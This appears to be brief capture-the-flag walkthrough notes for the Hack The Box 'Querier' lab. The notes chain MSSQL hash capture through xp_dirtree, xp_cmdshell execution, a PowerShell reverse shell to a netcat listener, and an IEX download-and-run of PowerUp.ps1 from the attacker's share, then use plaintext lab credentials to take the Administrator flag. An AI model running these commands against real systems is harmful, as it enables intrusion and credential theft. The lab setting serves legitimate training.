Querier - Hack The Box
N/A
USER
LISTENER:
python smbserver.py -smb2support -ip 10.10.14.3 reporting /tmp
RUN:
python mssqlclient.py -windows-auth querier/reporting:PcwTWTHRwryjc\$c6@10.10.10.125
SQL> EXEC master.sys.xp_dirtree '\\10.10.14.3\tmp'
Connect with credentials:
python mssqlclient.py querier/mssql-svc:corporate568@10.10.10.125 -windows-auth
> xp_cmdshell type C:\Users\mssql-svc\Desktop\user.txt
ROOT
Start smbserver and netcat listener:
$ python smbserver.py -smb2support -ip 10.10.14.11 querier /tmp
$ nc -lnvp 4444
Get reverse shell with PowerShellTcp:
SQL > xp_cmdshell move \\10.10.14.11\querier\Invoke-PowerShellTcp.ps1 C:\Users\mssql-svc\Desktop\pENIS.ps1
SQL > xp_cmdshell "powershell -file c:\Users\mssql-svc\Desktop\pENIS.ps1 -Reverse -IPAddress 10.10.14.11 -Port 4444"
PS > IEX (New-Object Net.WebClient).DownloadString('\\10.10.14.11\querier\PowerUp.ps1'); Invoke-AllChecks
[*] Checking for cached Group Policy Preferences .xml files....
Usernames : {Administrator}
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
Grab flag:
$ python smbclient.py querier/Administrator:MyUnclesAreMarioAndLuigi\!\!1\!@10.10.10.125
$ use C$
$ cd Users/Administrator/Desktop
$ get root.txt